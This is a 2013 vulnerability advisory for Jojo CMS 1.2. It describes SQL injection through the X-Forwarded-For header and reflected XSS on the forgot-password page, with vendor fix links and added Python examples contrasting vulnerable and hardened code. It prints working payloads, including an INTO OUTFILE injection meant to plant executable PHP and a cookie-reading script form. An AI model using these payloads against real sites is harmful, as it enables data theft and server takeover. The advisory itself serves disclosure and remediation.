Product: Jojo CMS
Vendor: The Jojo Team
Vulnerable Versions: 1.2 and probably prior
Tested Version: 1.2
Vendor Notification: April 17, 2013
Vendor Fix: May 6, 2013
Public Disclosure: May 15, 2013
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79]
CVE References: CVE-2013-3081, CVE-2013-3082
Risk Level: Medium
CVSSv2 Base Scores: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Jojo CMS, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) SQL Injection in Jojo CMS: CVE-2013-3081
The vulnerability is caused by insufficient sanitisation of the user-supplied "X-Forwarded-For" HTTP header when it is processed for requests to the "/articles/test/" URI. Any client can set this header, so a remote unauthenticated attacker can send a specially crafted HTTP request and execute arbitrary SQL commands in the application's database.
The PoC code below will create a file "/var/www/file.php" containing the contents of the "comment" table. INTO OUTFILE only succeeds if the database account has the MySQL FILE privilege, secure_file_priv does not restrict the target directory, the mysqld process can write to /var/www, and the file does not already exist:
POST /articles/test/ HTTP/1.1
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' --
Because the dumped rows include the comment bodies, an attacker who first posts a comment containing PHP code obtains a file under the web root that executes that code when it is requested, turning the injection into arbitrary PHP code execution on the vulnerable system.
Successful exploitation of the vulnerability requires that the "jojo comments" plugin is enabled (it is disabled by default).
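The following is an added example and not Jojo CMS code: it shows why a request header spliced into an SQL string is injectable with the tautology part of the PoC header above, and the two fixes a practitioner would apply (validate X-Forwarded-For as a list of IP addresses, and bind the value as a query parameter). An in-memory SQLite database with a constructed `comment` table stands in for MySQL, so the MySQL-only INTO OUTFILE clause is left out; the column names, header-handling functions and sample rows are assumptions for illustration.

```python
"""Added example (not Jojo CMS code): header-to-SQL injection and its fix.
SQLite stands in for MySQL; table layout and sample rows are constructed."""
import ipaddress
import sqlite3

# Constructed sample data, not taken from any real Jojo installation.
SAMPLE_COMMENTS = [
    ("10.0.0.5", "first post"),
    ("192.0.2.10", "looks good"),
    ("203.0.113.7", "<?php system($_GET['c']); ?>"),
]

# The tautology part of the advisory's PoC header. The INTO OUTFILE clause
# is MySQL-specific and is omitted so the demo runs on SQLite.
SQLI_PAYLOAD = "' OR 1=1 -- "


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comment (ip TEXT, body TEXT)")
    db.executemany("INSERT INTO comment VALUES (?, ?)", SAMPLE_COMMENTS)
    return db


def parse_forwarded_for(value):
    """Return the addresses in an X-Forwarded-For value (client first),
    or None if any element is not a syntactically valid IPv4/IPv6 address.
    The advisory's payload fails this check before it ever reaches SQL."""
    ips = []
    for part in value.split(","):
        try:
            ips.append(str(ipaddress.ip_address(part.strip())))
        except ValueError:
            return None
    return ips


def comments_vulnerable(db, headers):
    """Hypothetical vulnerable pattern: the proxy header is trusted as the
    visitor's IP and concatenated straight into the query string."""
    ip = headers.get("X-Forwarded-For", headers.get("REMOTE_ADDR", ""))
    sql = "SELECT ip, body FROM comment WHERE ip = '%s'" % ip
    return db.execute(sql).fetchall()


def comments_fixed(db, headers):
    """Hardened form: reject the header unless every element is an IP
    address, then pass the client address as a bound parameter so it can
    never change the statement's structure."""
    ips = parse_forwarded_for(headers.get("X-Forwarded-For", ""))
    if not ips:
        ips = [headers.get("REMOTE_ADDR", "")]  # fall back to the socket peer
    sql = "SELECT ip, body FROM comment WHERE ip = ?"
    return db.execute(sql, (ips[0],)).fetchall()


if __name__ == "__main__":
    db = make_db()
    attack = {"X-Forwarded-For": SQLI_PAYLOAD, "REMOTE_ADDR": "198.51.100.2"}
    print("vulnerable:", comments_vulnerable(db, attack))  # every row leaks
    print("fixed:     ", comments_fixed(db, attack))       # nothing for the peer
```

With the payload header, the concatenated query becomes `SELECT ip, body FROM comment WHERE ip = '' OR 1=1 -- '` and returns every row; the hardened version discards the header as malformed and falls back to the socket address. Validating the header also fixes the unrelated mishandling of proxy chains ("client, proxy1"), which the concatenating version compares as a single string.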
2) Cross-Site Scripting (XSS) in Jojo CMS: CVE-2013-3082
The vulnerability exists due to insufficient sanitisation of user-supplied data passed in the "search" HTTP POST parameter to the "/forgot-password/" URI. A remote attacker can trick a user into opening a specially crafted page that submits the form below and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
<form action="http://jojo/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>
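The following is an added example and not Jojo CMS code: it shows the reflected-XSS pattern behind the "/forgot-password/" finding and its fix. The page fragment is a made-up stand-in for whatever the real template renders; the point is the difference between echoing the "search" POST parameter verbatim and HTML-encoding it for each context it is inserted into (text node and double-quoted attribute). The second payload, the template and the helper functions are assumptions for illustration.

```python
"""Added example (not Jojo CMS code): reflected XSS of a POST parameter
and its fix by context-appropriate HTML encoding."""
import html

# The advisory's payload (with the cookie typo corrected).
XSS_PAYLOAD = "<script>alert(document.cookie);</script>"
# A second, constructed payload that breaks out of an attribute instead.
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'

# Constructed stand-in for the page fragment that reflects the parameter
# into both a text node and a double-quoted attribute value.
TEMPLATE = ('<p>Nothing found for {0}</p>\n'
            '<input type="text" name="search" value="{1}">')


def render_vulnerable(search):
    """Reflects the POST parameter unchanged into both contexts."""
    return TEMPLATE.format(search, search)


def render_fixed(search):
    """html.escape(quote=True) encodes < > & " and ', so the value is
    inert in the text node and inside the double-quoted attribute."""
    safe = html.escape(search, quote=True)
    return TEMPLATE.format(safe, safe)


def has_injected_markup(page):
    """Crude check: does the rendered page contain a script element or an
    attribute breakout (a raw quote followed by an injected attribute)?"""
    lowered = page.lower()
    return "<script" in lowered or '" autofocus' in lowered


if __name__ == "__main__":
    for payload in (XSS_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable:", has_injected_markup(render_vulnerable(payload)))
        print("fixed:     ", has_injected_markup(render_fixed(payload)))
```

Encoding on output is the fix; stripping "<script>" on input is not, since the attribute-context payload contains no tag at all and still executes in the vulnerable rendering.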
Solution: Upgrade to Jojo CMS version 1.2.2. The vendor's fix commits:
https://github.com/JojoCMS/Jojo-CMS/com ... add3a987d8
https://github.com/JojoCMS/Jojo-CMS/com ... 2cbf2d2236
References:
High-Tech Bridge Advisory HTB23153 - https://www.htbridge.com/advisory/HTB23153 - Multiple vulnerabilities in Jojo CMS
Jojo CMS - http://www.jojocms.org/ - Jojo is a PHP-based free CMS for web developers wanting to build good websites.
Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.